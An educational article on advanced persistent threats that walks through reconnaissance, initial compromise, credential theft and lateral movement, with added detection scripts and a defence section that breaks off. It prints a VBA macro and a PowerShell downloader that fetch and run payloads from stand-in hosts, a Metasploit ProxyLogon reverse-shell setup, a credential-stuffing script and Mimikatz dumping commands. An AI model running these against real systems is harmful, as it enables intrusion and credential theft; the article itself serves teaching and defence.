APT threats: advanced persistent attacks

What are APT threats, how they work, and how to defend your systems from these advanced persistent attacks in cyber security.

Advanced Persistent Threats

Table of contents

  • What is an APT
  • Common targets of APTs
  • The purpose behind APTs
  • The APT lifecycle
  • Initial reconnaissance
  • Initial Compromise
  • Real-case timeline (simplified)
  • Internal reconnaissance
  • Lateral movement (pivoting)
  • How to defend against APTs
  • APTs: a constantly evolving threat

Advanced Persistent Threats, or APTs, represent one of the most sophisticated and dangerous forms of cyberattack today.

These threats are not the work of lone hackers but of highly organized groups, often state-sponsored, with access to substantial resources, advanced techniques, and time.

In this article, we’ll explore what APT means, how APT threats operate, and most importantly, how to defend against them in a modern cyber security environment.

Unlike common malware, APTs are not hit-and-run attacks. They are defined by their persistence, sophistication, and stealth. We’ll walk through their typical attack lifecycle, common targets, strategic objectives, technical phases, and the best practices to stay secure—always keeping an eye on the latest cyber security news.

What is an APT

The acronym APT stands for Advanced Persistent Threat, a term that has become central in the field of cyber security.

But to fully understand what APT means, we need to break down the three components of the name. Each word—Advanced, Persistent, and Threat—captures a core aspect of this uniquely dangerous and complex type of cyberattack.

Advanced

The “advanced” nature of an APT refers to the technical sophistication and meticulous planning behind the attack.

APT threats are not limited to commodity viruses or malware downloaded from the Internet: they are the product of complex operations that can include exploitation of zero-day vulnerabilities (security bugs unknown to the software vendor and therefore unpatched), polymorphic malware, evasion of detection systems, and the use of several attack vectors at once (e.g. email, network, USB devices, cloud applications).

Attackers often build a bespoke toolkit for the target, with encrypted payloads, hidden backdoors and extremely stealthy channels for communicating with their command-and-control (C2) servers.

Well-known examples are Duqu and Flame, malware designed to collect information from strategic targets without being detected by conventional antivirus. The combination of precise targeting and tactics built to stay under the radar for as long as possible is exactly what the word “advanced” captures.

Persistent

The term “persistent” indicates the attacker’s primary objective: not to flee immediately with the loot, but to remain inside the compromised system as long as possible.

We are not talking about lightning attacks, but slow and methodical infiltrations, where the attacker insinuates himself into the network, observes, gathers information, performs reconnaissance and moves with caution. This persistence can last months, if not years, with the aim of invisibly controlling the target’s IT infrastructure, without generating obvious alarms.

The malware used in APTs is often equipped with self-updating mechanisms and redundant persistence: several implants, several C2 channels, fallback accounts. If one component is discovered and removed, another re-establishes access, so the attacker always keeps a foothold in the network. It is this resilience that makes APTs so difficult to eradicate.

Threat

Finally, the “threat” refers to the structured and organized nature of the attack. An APT attack is not the result of chance or a curious teenager: it is an operation carried out by highly qualified groups, often with significant economic and technical resources, sometimes sponsored by governments or large criminal organizations.

These are the so-called APT groups, known in the international news with acronyms such as APT28 (Fancy Bear), APT29 (Cozy Bear), Lazarus Group, Charming Kitten, and many others. Each group has its own peculiarities, its geographical area of ​​reference and its preferred attack techniques.

Many APT attackers are also able to combine digital techniques with extremely sophisticated social engineering operations, compromising not only the systems, but also the behavior and habits of internal users, with attacks via LinkedIn, email, social media or perfectly credible fake login portals.

APT vs Traditional Malware

What separates an APT attack from regular malware is not just complexity, but intent and scope. A regular ransomware attack may encrypt a company’s data and demand payment—a destructive, visible, and immediate blow.

An Advanced Persistent Threat, on the other hand, moves in the shadows, acting intelligently, studying the IT structure of the organization, striking at weak points and without revealing its presence.

It is like comparing a sudden robbery to a long infiltration operation by a trained spy. Ransomware is noisy, visible, and immediate.

An APT, on the other hand, is silent, calculated, and long-term oriented. This makes APTs extremely dangerous: not only do they cause damage, but they do it without being discovered, often making it impossible to reconstruct precisely what has been stolen, compromised, or altered.

So what does APT really mean?

In short, an APT is best understood as a sophisticated digital infiltration campaign, typically aimed at national interests, global corporations, or critical infrastructure.

An APT attack can start with a simple email attachment, but continue with unauthorized remote access, credential theft, data manipulation, attacks on business partners, and much more. And it can remain hidden for as long as necessary.

Modern cyber security must therefore adapt to this new dimension of the cyber threat. Advanced persistent threats are now an integral part of the computer security news landscape, and it is essential for companies, public entities and even advanced users to recognize the signs of a possible infiltration and strengthen their defensive posture.

Common targets of APTs

APT threats are highly targeted and focus on organizations of strategic relevance, such as:

  • Government agencies and military institutions
  • Multinational corporations (especially in energy, technology, and defense)
  • Banks and critical infrastructure (e.g., utilities, healthcare, telecommunications)
  • Influential NGOs and think tanks

Example
Stuxnet, the worm used in a campaign to sabotage the centrifuges of Iran’s uranium enrichment program. Other examples include the 2020 SolarWinds supply-chain compromise, the 2011 RSA SecurID breach, and targeted attacks on universities and biotech companies.

The purpose behind APTs

The goal of an Advanced Persistent Threat is not quick financial gain. Instead, APTs focus on long-term strategic advantages:

  • Industrial espionage
    Stealing patents, business strategies, or trade secrets.
  • Political/military espionage
    Accessing confidential documents or communications.
  • Sabotage
    Disrupting operational systems or infrastructure.
  • Geopolitical influence
    Interfering with elections, spreading disinformation, destabilizing regions.

In essence, APTs are tools of control and influence—not just destruction.

The APT lifecycle

One of the defining traits of APTs is their structured, multi-phase approach. These attacks unfold over time and are carefully crafted to remain undetected. Below, we explore the typical APT attack lifecycle.

Initial reconnaissance

The initial reconnaissance phase is the crucial starting point of any Advanced Persistent Threat (APT) campaign. This is where attackers build the foundation for the entire operation, collecting every possible detail about their target.

At this stage, the goal is not to breach systems, but to understand the environment, identify weak points, and plan the attack path with precision. It’s the cyber equivalent of military surveillance or intelligence gathering before an operation.

The strategic value of intelligence gathering

An APT group never launches an attack blindly. Instead, they invest significant time and effort in systematically collecting information.

Depending on the target’s complexity and scope, this phase can last days, weeks, or even months, combining automated scans with meticulous manual research.

The information gathered during reconnaissance is not only used to identify vulnerabilities to exploit, but also to adapt the language and behavior of the malware (or phishing campaign) to the real-world context of the target organization.

This level of customization is one of the reasons why APT threats are so effective.

What kind of information do attackers collect?

During the reconnaissance phase, attackers gather a broad range of intelligence, including:

  • Organizational structure
    Leadership, departments, office locations, and internal workflows.
  • Key personnel and roles
    Especially IT admins, security staff, finance managers, and C-level executives.
  • Vendors and third-party connections
    Potential supply chain entry points.
  • Email addresses, usernames, phone numbers
    Used for targeted phishing and credential attacks.
  • Technologies in use
    CMS platforms, cloud services, exposed APIs, remote desktop access.
  • Network topology
    Public IP ranges, DNS records, VPN endpoints, and load balancers.

Individually, these data points may seem harmless—but together, they form a comprehensive attack map, allowing the APT to craft precise intrusion tactics.

Tools and techniques for reconnaissance

Attackers use a mix of passive and active reconnaissance methods:

  • Passive reconnaissance
    Gathering information without interacting directly with the target’s systems.
  • Active reconnaissance
    Directly probing the infrastructure through scans, crafted emails, or test payloads.

Let’s look at some of the most common methods:

1. OSINT (Open Source Intelligence)

OSINT is the backbone of passive recon. It involves collecting data from publicly available sources. Common tools and platforms include:

  • Google Dorking
    e.g., filetype:pdf site:targetdomain.com to find internal documents.
  • LinkedIn
    to profile employees, identify roles and departments.
  • Shodan and Censys
    to find internet-exposed devices and misconfigured ports.
  • WHOIS, crt.sh, and DNSDumpster
    for domain, DNS and certificate analysis.
  • GitHub, Pastebin, and forums
    Where credentials or sensitive files might accidentally be leaked.
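As an added example (not from the original article), the script below shows how passive OSINT output becomes an attack-surface inventory: it takes JSON in the shape that a crt.sh query returns and extracts the hostnames under the target domain, separating wildcard certificates and skipping lookalike domains. The records, the domain targetdomain.com and the keyword list are constructed for the example, and nothing is fetched from the network.

```python
"""Passive reconnaissance from certificate transparency data.

Added example (not from the original article): takes JSON in the shape a
crt.sh query such as https://crt.sh/?q=%25.targetdomain.com&output=json
returns and turns it into a deduplicated inventory of hostnames under the
target domain. The records below are constructed; nothing is fetched.
"""
import json
import re
from collections import Counter

# Constructed sample in crt.sh's output shape (fields trimmed).
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "vpn.targetdomain.com\nvpn-old.targetdomain.com",
     "not_after": "2024-09-01T00:00:00"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "name_value": "*.targetdomain.com",
     "not_after": "2025-01-15T00:00:00"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "mail.targetdomain.com",
     "not_after": "2024-11-20T00:00:00"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "VPN.TargetDomain.com",          # duplicate, different case
     "not_after": "2024-06-01T00:00:00"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "dev-jenkins.targetdomain.com\nstaging.targetdomain.com",
     "not_after": "2023-03-01T00:00:00"},
    {"issuer_name": "CN=Unrelated",
     "name_value": "targetdomain.com.evil.example",  # lookalike, not the target
     "not_after": "2024-01-01T00:00:00"},
])

HOSTNAME_RE = re.compile(r"^(\*\.)?[a-z0-9-]+(\.[a-z0-9-]+)*$")


def hostnames_from_crtsh(raw_json, domain):
    """Return (hosts, wildcards): sorted, lowercased names that are the
    target domain or end with it. Wildcard entries are kept apart because
    they name a whole subtree, not a host."""
    domain = domain.lower()
    hosts, wildcards = set(), set()
    for entry in json.loads(raw_json):
        # crt.sh joins multiple SANs of one certificate with newlines.
        for name in entry.get("name_value", "").split("\n"):
            name = name.strip().lower()
            if not HOSTNAME_RE.match(name):
                continue
            if name != domain and not name.endswith("." + domain):
                continue  # lookalike or unrelated domain
            (wildcards if name.startswith("*.") else hosts).add(name)
    return sorted(hosts), sorted(wildcards)


def interesting_labels(hosts):
    """Count leftmost labels hinting at remote access or non-production
    systems, the hosts an attacker would probe first (keyword list is an
    assumption for the example)."""
    keywords = ("vpn", "mail", "dev", "staging", "jenkins", "test", "old")
    hits = Counter()
    for host in hosts:
        label = host.split(".")[0]
        for keyword in keywords:
            if keyword in label:
                hits[keyword] += 1
    return hits


if __name__ == "__main__":
    hosts, wildcards = hostnames_from_crtsh(SAMPLE_CRTSH_JSON, "targetdomain.com")
    print("hosts:", hosts)
    print("wildcards:", wildcards)
    print("hints:", dict(interesting_labels(hosts)))
```

The same parser works on the real crt.sh response; the point of the example is the normalisation (case, multi-SAN records, wildcards, lookalike domains), which is where hand-built recon scripts usually go wrong.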

2. Social Engineering

The attacker can create fake profiles on social media, sign up for company newsletters, interact in forums or communities where the company is present.

Sometimes they can simulate a candidate for a job position, or pretend to be a supplier looking for information. These techniques exploit human psychology, more than technology, and often represent the most delicate and creative part of reconnaissance.

3. Reconnaissance phishing (non-malicious probes)

In more active campaigns, attackers may send non-malicious emails to test the responsiveness of users. These messages:

  • Confirm which email addresses are active
  • Track who opens links or downloads files
  • Reveal security layers (e.g., email filtering or MFA)
  • Capture metadata like IP addresses or mail client types

This helps attackers calibrate future spear phishing emails, making them more believable and effective.

4. Active scanning and fingerprinting

Though riskier, active reconnaissance provides deeper insights. Tools and techniques include:

  • Nmap, Masscan: scanning for open ports and services
  • WhatWeb, Wappalyzer: identifying CMS and frontend technologies
  • Netcraft: gaining information on hosting providers and uptime history
  • FOCA: extracting metadata from documents (e.g., Word, PDF files published on the site)

Example of an Nmap scan command:

nmap -sV -T4 -Pn -p 1-10000 targetdomain.com

This reveals which services are running and their versions, and therefore whether any are outdated or vulnerable. Note that -Pn skips host discovery and -T4 is an aggressive timing template: the scan is fast but noisy and easily logged by the target, which is why active probing is the riskier half of reconnaissance.

Behavioral profiling: a modern APT tactic

Elite APT actors don’t stop at technical data—they also build behavioral profiles. These profiles track:

  • Working hours and time zones of IT staff
  • Typical email or communication patterns
  • Administrative routines (e.g., maintenance windows)
  • Device usage and login behavior

Such insights allow attackers to strike during weak points—like holiday periods, employee transitions, or late-night hours—maximizing their chances of success while avoiding detection.

Reconnaissance: the blueprint of the entire attack

By the end of this phase, the attacker has constructed a detailed blueprint of the target’s digital environment. They now know:

  • How to impersonate an insider
  • Where the valuable data is stored
  • Which systems are most vulnerable
  • When and how to move without triggering alerts

This strategic knowledge is what sets APTs apart from regular cyberattacks. Their success depends heavily on the quality of reconnaissance. The better the intelligence, the smoother the intrusion and the longer the persistence.

Initial Compromise

Once attackers have completed thorough initial reconnaissance, they move to the next critical step in the APT lifecycle: initial compromise.

This is where the operation shifts from passive intelligence gathering to active intrusion. It’s the moment when the attacker finds a way to penetrate the target’s defenses and gain a foothold in the network or system.

Unlike typical malware campaigns, initial compromise in APT attacks is highly customized, precise, and designed to evade detection.

Let’s examine the most common techniques used, supported by real-world examples and code snippets.

1. Spear Phishing

The most widespread and successful technique for APT initial access is spear phishing: a targeted phishing attack tailored specifically to the victim.

It uses the intelligence gathered during reconnaissance to craft convincing emails that appear to come from trusted sources like colleagues, vendors, or internal departments.

Real-world scenario:

An attacker sends an email to an HR employee, posing as a job applicant. The attached resume is a Word document containing a malicious macro that opens a backdoor on the victim’s machine.

Example: malicious VBA macro in Word

' Runs automatically when the document is opened (and macros are enabled)
Sub AutoOpen()
    Dim url As String
    url = "http://malicious-server.com/payload.exe"

    ' Fetch the second-stage executable over plain HTTP
    Dim http As Object
    Set http = CreateObject("Microsoft.XMLHTTP")
    http.Open "GET", url, False
    http.Send

    ' Write the response body to disk as a binary file
    ' (Type = 1 is adTypeBinary, SaveToFile option 2 is adSaveCreateOverWrite)
    Dim stream As Object
    Set stream = CreateObject("ADODB.Stream")
    stream.Type = 1
    stream.Open
    stream.Write http.responseBody
    stream.SaveToFile "C:\Users\Public\payload.exe", 2

    ' Launch it with a hidden window
    Shell "C:\Users\Public\payload.exe", vbHide
End Sub

When the document is opened and macros are enabled, the code downloads and silently executes the malware.

2. Exploiting Zero-Day Vulnerabilities

Zero-day vulnerabilities are unpatched security flaws unknown to the vendor. These are among the most powerful tools in the APT arsenal, as there is often no immediate defense available.

Attackers exploit these flaws through malicious documents, vulnerable web apps, or exposed services like Exchange, RDP, or VPNs.

Notable example:

In the 2021 Hafnium campaign, attackers chained four zero-day vulnerabilities in on-premises Microsoft Exchange (the “ProxyLogon” chain) to gain remote code execution on the server and read internal mailboxes.

Simulated exploit using Metasploit (the module also requires a valid mailbox address in the target organization, passed as EMAIL):

use exploit/windows/http/exchange_proxylogon_rce
set RHOSTS mail.targetcorp.com
set EMAIL administrator@targetcorp.com
set LHOST 10.0.0.5
set LPORT 4444
exploit

Once exploited, a reverse shell connects back to the attacker’s LHOST with the privileges of the Exchange web process (typically SYSTEM), giving full control over the server.

3. Malicious File Attachments

In many cases, attackers use infected Office documents, PDFs or ZIP archives, attached to perfectly contextualized emails (commercial offers, orders, invitations, invoices). The user, trusting, opens the file and triggers the execution of the malicious code.

Example: PowerShell downloader embedded in a macro

# Download a second-stage binary into the user's temp folder and run it
$wc = New-Object Net.WebClient
$wc.DownloadFile("http://badhost.com/backdoor.exe", "$env:TEMP\backdoor.exe")
Start-Process "$env:TEMP\backdoor.exe"

This script downloads a backdoor and executes it on the machine. If the organization does not restrict PowerShell (Constrained Language Mode, script block logging, application control) and does not block macros in documents that arrived from the Internet, the infection takes seconds.

4. Stolen Credential Access

APT actors often acquire stolen credentials through previous data breaches, phishing, or dark web purchases. With valid usernames and passwords in hand, they can access:

  • VPNs and remote access systems
  • Cloud platforms like Office 365, Google Workspace, or Azure
  • Admin panels or privileged accounts
  • Shared workstations and internal tools

Often, if the credentials are not protected by MFA, the attacker can log in undetected, appear to be a legitimate user, and begin lateral movement.

Example: automated login attempt in Python

import requests

URL = "https://vpn.corporate.com/login"
# One username/password pair taken from a breach dump; a credential
# stuffing tool loops over thousands of these
CREDENTIALS = {"username": "admin.user", "password": "Summer2024!"}

session = requests.Session()
response = session.post(URL, data=CREDENTIALS, timeout=10)

# Crude success check: the post-login page contains the word "dashboard"
if "dashboard" in response.text:
    print("Login successful!")
else:
    print("Login failed.")

This script can be part of a credential stuffing tool that tests thousands of known username-password pairs. Without multi-factor authentication (MFA), a single success is indistinguishable from a legitimate login unless source address, timing and user agent are examined.
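The defensive counterpart, as an added example that is not part of the original article: a detector that reads VPN authentication logs and flags the pattern the script above produces when run at scale, one source address trying many distinct accounts in a short window, with a separate flag for any success that follows the burst. The log line format, the thresholds and the log lines themselves are constructed assumptions.

```python
"""Detecting credential stuffing / password spraying in VPN auth logs.

Added example, not part of the original article. Parses constructed VPN
authentication log lines (the "user=... src=... result=..." syslog shape
is an assumption) and flags source addresses that try many distinct
usernames within a short window, plus any success that follows the burst.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one address sprays several accounts at 2 AM and
# finally succeeds; a legitimate user mistypes once, then logs in.
SAMPLE_LOG = """\
2024-05-03T02:00:01Z vpn-gw auth user=admin.user src=203.0.113.7 result=FAIL
2024-05-03T02:00:02Z vpn-gw auth user=j.rossi src=203.0.113.7 result=FAIL
2024-05-03T02:00:03Z vpn-gw auth user=m.bianchi src=203.0.113.7 result=FAIL
2024-05-03T02:00:04Z vpn-gw auth user=svc.backup src=203.0.113.7 result=FAIL
2024-05-03T02:00:05Z vpn-gw auth user=l.verdi src=203.0.113.7 result=FAIL
2024-05-03T02:00:06Z vpn-gw auth user=f.neri src=203.0.113.7 result=SUCCESS
2024-05-03T08:55:10Z vpn-gw auth user=a.conti src=198.51.100.20 result=FAIL
2024-05-03T08:55:30Z vpn-gw auth user=a.conti src=198.51.100.20 result=SUCCESS
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ auth user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>\w+)$"
)


def parse_log(text):
    """Return (timestamp, user, src, result) tuples; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["user"], m["src"], m["result"]))
    return events


def detect_spraying(events, window=timedelta(minutes=10), min_users=4):
    """Return {src: {"users": n, "success_after_burst": [...]}} for every
    source that touched at least `min_users` distinct accounts inside a
    sliding window of `window`. A SUCCESS seen while the burst condition
    holds is recorded: that is the login MFA would have stopped."""
    by_src = defaultdict(list)
    for ev in sorted(events):
        by_src[ev[2]].append(ev)
    findings = {}
    for src, evs in by_src.items():
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide window start
                start += 1
            users = {e[1] for e in evs[start:end + 1]}
            if len(users) < min_users:
                continue
            f = findings.setdefault(src, {"users": 0, "success_after_burst": []})
            f["users"] = max(f["users"], len(users))
            if evs[end][3] == "SUCCESS" and evs[end][1] not in f["success_after_burst"]:
                f["success_after_burst"].append(evs[end][1])
    return findings


if __name__ == "__main__":
    for src, f in detect_spraying(parse_log(SAMPLE_LOG)).items():
        print(f"{src}: {f['users']} accounts tried; "
              f"successes after burst: {f['success_after_burst'] or 'none'}")
```

The per-source distinct-user count is what separates spraying from a single user fumbling a password (198.51.100.20 above never trips the rule). In practice the same logic runs as a scheduled search in the SIEM, and the "success after burst" list is the one to page on.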

Initial compromise conclusion

Once initial access is gained, the attacker is “in”. However, the goal of an APT threat is not just to enter: it is to stay, move, explore and strike deeply.

At this point, the malware can install a backdoor, perform privilege escalation and start internal mapping of the network.

The initial compromise phase is therefore the real turning point: from here the silent operation begins that can turn into espionage, theft, sabotage or extortion on a large scale.

Preventing it means investing in user training, network segmentation, behavioral analysis and constant log monitoring.

Real-case timeline (simplified)

Establishing a foothold

Once “inside”, the attacker creates a foothold, a persistent access point:

  • Installs a backdoor
  • Configures auto-execution mechanisms
  • Circumvents antivirus systems

A command-and-control (C2) channel is used to receive instructions or download additional payloads.

Privilege escalation

In order to operate with full freedom, the attacker tries to obtain administrative privileges. This phase can include:

  • Credential dumping from memory (with tools like Mimikatz)
  • Local exploits that elevate permissions (unpatched local privilege escalation vulnerabilities)
  • Abuse of misconfigurations (weak service permissions, unquoted service paths, over-privileged scheduled tasks)

Example code in PowerShell to extract credentials (Invoke-Mimikatz is the PowerShell wrapper around Mimikatz; sekurlsa::logonpasswords needs SeDebugPrivilege, so this step already requires local administrator rights on the host):

Invoke-Mimikatz -Command '"privilege::debug" "log" "sekurlsa::logonpasswords"'

Internal reconnaissance

After successfully gaining initial access to the target’s network—whether through phishing, exploit, or stolen credentials—an attacker engaged in an APT threat doesn’t immediately move to exfiltration or disruption.

Instead, they proceed with a critical step: internal reconnaissance.

This phase allows the attacker to understand the environment, identify valuable assets, map the network, and prepare for privilege escalation or lateral movement.

Think of it like a burglar who doesn’t just enter a house, but explores all the rooms, checks which doors are locked, finds keys, and maps out the security systems—without being noticed.

Objectives of internal reconnaissance

The attacker’s goals in this phase are to:

  • Enumerate internal hosts, shares, and databases
  • Identify critical systems like domain controllers, financial servers, or backups
  • Explore Active Directory relationships and group memberships
  • Understand the organization’s security policies
  • Harvest additional credentials to escalate privileges

These actions are typically carried out using native tools or “living off the land” techniques, which allow attackers to blend in with legitimate system activity.

1. Host and share enumeration

The first step is to discover which systems are accessible from the current foothold. The attacker uses common Windows tools and scripting languages like PowerShell to identify live hosts and shared folders.

PowerShell: Scan a subnet for active hosts

# One ICMP echo per address in 192.168.1.0/24; print the ones that answer
1..254 | ForEach-Object {
    $ip = "192.168.1.$_"
    if (Test-Connection -ComputerName $ip -Count 1 -Quiet) {
        Write-Output "$ip is alive"
    }
}

This script pings each IP address in a /24 subnet to find online devices.

View shared folders on a discovered host

net view \\192.168.1.50

Or using PowerShell:

Get-SmbShare -CimSession 192.168.1.50

These commands can expose poorly secured shares containing documents, credentials, or network diagrams—often gold mines for attackers.

2. Active Directory user and group enumeration

Understanding Active Directory (AD) is one of the attacker’s top priorities. AD is often the central nervous system of corporate IT environments.

List all AD users and their groups:

Get-ADUser -Filter * -Properties DisplayName, MemberOf | Select Name, MemberOf

Identify privileged accounts:

Get-ADGroupMember -Identity "Domain Admins"

By analyzing these relationships, attackers can plan stealthier lateral movement toward sensitive systems.

3. BloodHound: Visualizing Active Directory attack paths

BloodHound is one of the most powerful tools in an APT actor’s arsenal for mapping attack paths within AD. It builds a graph of relationships between users, computers, groups, and ACLs to show how an attacker can escalate privileges.

How BloodHound works:

  1. The attacker runs SharpHound on a compromised host.
  2. It collects AD data (sessions, group memberships, ACLs).
  3. The data is loaded into the BloodHound GUI, which reveals paths to sensitive assets.

SharpHound command example:

SharpHound.exe -c All -d targetdomain.local -zipfilename data.zip

Once analyzed, the attacker sees:

  • Shortest paths to Domain Admins
  • Kerberoastable users
  • Excessive permissions and misconfigured ACLs

These visual insights help prioritize which accounts or systems to compromise next.

4. Assessing security controls and audit settings

APT attackers want to know how much freedom of movement they have. They analyze GPOs (Group Policy Objects), file permissions, the active audit policy, and defense mechanisms such as Windows Defender, EDR, or SIEM forwarding in place.

Check audit policy:

auditpol /get /category:*

Check if Windows Defender is running:

Get-MpComputerStatus

If the environment lacks proper auditing, the attacker can act with impunity—and many do for weeks or months before being discovered.
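A defender can run the same auditpol command and compare the result with a baseline. As an added example (not from the original article), the following parses the text output of auditpol /get /category:* and lists the subcategories that fall short of a required setting. The sample output is constructed in auditpol’s layout, and the baseline is an assumption: a handful of subcategories relevant to the attack phases described on this page, not a full hardening guide.

```python
"""Checking the local audit policy against a minimum baseline.

Added example, not part of the original article. An attacker runs
`auditpol /get /category:*` to learn what is NOT logged; a defender should
run it too and diff the result against a baseline. This parses the
command's text output (constructed below in auditpol's layout) and lists
every subcategory below the required setting. The baseline is an
assumption covering a few subcategories relevant to this page.
"""
import re

# Minimum settings for subcategories the attack phases on this page touch.
REQUIRED = {
    "Logon": "Success and Failure",                     # 4624/4625
    "Security Group Management": "Success and Failure",  # 4728/4732 etc.
    "Process Creation": "Success",                       # 4688
    "Audit Policy Change": "Success and Failure",        # attackers turn auditing off
    "Kerberos Service Ticket Operations": "Success",     # 4769, Kerberoasting
    "File Share": "Success",                             # 5140, share enumeration
}

# Constructed, abridged sample of `auditpol /get /category:*` output.
SAMPLE_AUDITPOL = """\
System audit policy
Category/Subcategory                      Setting
System
  Security System Extension               No Auditing
  System Integrity                        Success and Failure
Logon/Logoff
  Logon                                   Success
  Logoff                                  Success
Object Access
  File Share                              No Auditing
Detailed Tracking
  Process Creation                        No Auditing
Policy Change
  Audit Policy Change                     Success and Failure
Account Management
  Security Group Management               Success
Account Logon
  Kerberos Service Ticket Operations      Success
"""

# Subcategory lines are indented by two spaces; categories are not.
_SUB_RE = re.compile(
    r"^\s{2}(?P<name>.+?)\s{2,}(?P<setting>No Auditing|Success and Failure|Success|Failure)\s*$"
)


def parse_auditpol(text):
    """Return {subcategory: setting} from auditpol's text output."""
    policy = {}
    for line in text.splitlines():
        m = _SUB_RE.match(line)
        if m:
            policy[m["name"]] = m["setting"]
    return policy


def _covers(actual, required):
    """Does the actual setting include everything the required one does?"""
    def parts(setting):
        if setting == "Success and Failure":
            return {"Success", "Failure"}
        return set() if setting == "No Auditing" else {setting}
    return parts(required) <= parts(actual)


def audit_gaps(text, required=REQUIRED):
    """List (subcategory, actual, required) for every shortfall; a
    subcategory absent from the output counts as 'No Auditing'."""
    policy = parse_auditpol(text)
    return [(sub, policy.get(sub, "No Auditing"), req)
            for sub, req in required.items()
            if not _covers(policy.get(sub, "No Auditing"), req)]


if __name__ == "__main__":
    for sub, actual, req in audit_gaps(SAMPLE_AUDITPOL):
        print(f"{sub}: is '{actual}', needs '{req}'")
```

Run this from a scheduled job that captures the real auditpol output and ships the gap list to the SIEM: an attacker who weakens auditing with auditpol /set then shows up twice, once as an Audit Policy Change event and once as a new gap.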

5. Credential and token harvesting

During internal reconnaissance, attackers look for configuration files, stored passwords, session tokens, and cookies. Passwords are often in plain text or poorly protected.

Example: Using Mimikatz to dump credentials

Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'

Or, token collection for impersonation:

mimikatz # sekurlsa::tickets

With these credentials or tickets the attacker can impersonate other users, even administrators, without knowing a password (pass-the-hash, pass-the-ticket).
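Both Mimikatz invocations on this page (the privilege escalation example and the one above) read LSASS memory, which Sysmon records as a ProcessAccess event (Event ID 10) whose target is lsass.exe. The following added example, not from the original article, flags such events when the granted access mask includes PROCESS_VM_READ and the caller is not on an allow-list. The events are constructed; the allow-list is an assumption to tune per environment.

```python
"""Detecting LSASS credential dumping from Sysmon ProcessAccess events.

Added example, not part of the original article. sekurlsa::logonpasswords
reads LSASS memory, so the caller must open lsass.exe with a mask that
includes PROCESS_VM_READ (0x0010); Sysmon Event ID 10 records the source
image, the target image and that GrantedAccess mask (0x1010, VM_READ plus
QUERY_LIMITED_INFORMATION, is the value commonly seen with Mimikatz).
Events are constructed; the allow-list is an assumption to tune locally.
"""
PROCESS_VM_READ = 0x0010
# Query-only rights (0x1000, 0x0400) are what Task Manager and monitoring
# agents ask for; they cannot read memory and are not flagged.

# Processes that legitimately read LSASS memory (assumption: tune locally).
BENIGN_SOURCE_IMAGES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed Sysmon EID 10 records (field names follow Sysmon's schema).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\payload.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\explorer.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1FFFFF"},
]


def is_lsass_read(event):
    """True when a process outside the allow-list obtained VM_READ on lsass.exe."""
    if event.get("EventID") != 10:
        return False
    if not event["TargetImage"].lower().endswith(r"\lsass.exe"):
        return False
    if event["SourceImage"].lower() in BENIGN_SOURCE_IMAGES:
        return False
    granted = int(event["GrantedAccess"], 16)
    return bool(granted & PROCESS_VM_READ)


def find_lsass_dumpers(events):
    """Source images that read LSASS memory, in event order."""
    return [e["SourceImage"] for e in events if is_lsass_read(e)]


if __name__ == "__main__":
    for image in find_lsass_dumpers(SAMPLE_EVENTS):
        print("possible credential dump by", image)
```

Invoke-Mimikatz shows up here as powershell.exe, which is why the check keys on the access mask rather than on a tool name. Credential Guard or RunAsPPL on LSASS removes most of the payoff from this technique, but the detection still matters: the attempt itself is a strong signal.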

Lateral movement (pivoting)

Now the attacker performs lateral movement to reach deeper systems:

  • Using Pass-the-Hash or stolen credentials
  • Connecting via RDP, WMI, or PsExec
  • Leveraging built-in admin tools to avoid detection

This phase is often where the attacker makes contact with sensitive systems.

Maintaining presence

A core goal of APT attacks is long-term persistence:

  • Creating hidden admin accounts
  • Replacing or modifying legitimate binaries
  • Installing rootkits or firmware-based implants

Some attackers lie dormant for months before reactivating their access.

Mission completion

Finally, attackers execute their objective:

  • Data exfiltration (via encrypted channels or cloud services)
  • Sabotage (deleting, modifying, or encrypting data)
  • Propagation to partners or subsidiaries

The most insidious part is that the attack can go unnoticed for months, causing enormous damage before being discovered.

How to defend against APTs

Defending against Advanced Persistent Threats is not a matter of installing antivirus software and hoping for the best. These threats are stealthy, intelligent, and designed to evade traditional security measures.

That’s why organizations must adopt a multi-layered security strategy that integrates advanced technology, strong policies, and a pervasive security-first culture.

The most effective defense is one that combines prevention, detection, response, and resilience. It’s not about building an impenetrable wall—it’s about creating an environment where intrusions are spotted early, contained quickly, and where damage can be mitigated effectively.

Logging: visibility is everything

Centralized logging is the foundation of any effective defense infrastructure against APTs. Collecting logs from systems, firewalls, endpoints, servers, applications, and cloud services allows you to correlate suspicious events and identify anomalous patterns of behavior.

Recommended tools:

  • SIEM platforms like Splunk, ELK Stack, Wazuh, IBM QRadar
  • UEBA (User and Entity Behavior Analytics) solutions, which detect deviations from user and system baselines

Example:

